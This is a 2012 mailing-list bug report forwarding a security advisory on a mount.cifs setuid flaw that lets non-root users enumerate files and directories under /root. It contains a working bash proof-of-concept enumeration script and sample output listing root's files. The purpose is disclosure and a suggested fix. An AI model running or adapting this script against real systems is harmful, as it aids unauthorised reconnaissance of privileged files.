[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
bug#10965: mount.cifs vulnerability
From: |
Jesus Olmos |
Subject: |
bug#10965: mount.cifs vulnerability |
Date: |
Wed, 07 Mar 2012 19:33:49 +0100 |
User-agent: |
Mozilla/5.0 (X11; Linux x86_64; rv:8.0) Gecko/20111108 Thunderbird/8.0 |
Hello, here is a bug report for mount.cifs,
is a little security breach on linux permissions by controlling a
privileged chdir()
regards.
########## Blueliv Advisory 2012-004 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
####################################
1. VULNERABILITY
-------------------------
linux arbitrary privileged arbitrary chdir(),
this leads to an arbitarry file identification as root.
2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of linux base system, and is setuided on
most of the distributions.
This software mounts cifs partition to authorized directories by fstab.
3. DESCRIPTION
-------------------------
Althow there is not authorized cifs mounts, is possible by the second
parameter
to control a privileged chdir() syscall and infer the return value throught
the responses.
This implies, a little security breach on linux permissions. A non root user
can enumerate files and directories as root.
This can help to exploit another vulnerabilities, enumerate /root/ contents,
descriptors used by any process, user homes, etc ...
one of the attack vectors is /root/ directory scan:
address@hidden advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile
dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret
Also let to enumerate sub-sub directories in order to dump readable files.
4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by address@hidden
# discover root protected files & directories, user homes, process
descriptors, ...
path=$2
wordlist=$1
for i in `cat $wordlist`
do
echo -n "$i:"
/sbin/mount.cifs //127.0.0.1/a $path/$i
done 2>log.$$ 1>&2
echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1`
do
echo $i
done
echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1`
do
echo $i
done
rm log.$$
5. BUSINESS IMPACT
-------------------------
The confidenciality can be breached,
This method of transfer files, is highly dangerous and can rely on a
remote control of the server
6. SYSTEMS AFFECTED
-------------------------
all versions are affected
7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.
8. REFERENCES
-------------------------
http://gnu.org
9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
BLUELIV
10. DISCOLSURE TIMELINE
-------------------------
February 20, 2012: Vulnerability discovered
March 07, 2012: Reported to the vendor
11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
--
Jesus Olmos
address@hidden
Parc Innovació La Salle
C/Sant Joan de la Salle 42, Planta 3
08022 Barcelona
Telf. + 34 902908712
Fax. + 34 933960900
- bug#10965: mount.cifs vulnerability,
Jesus Olmos <=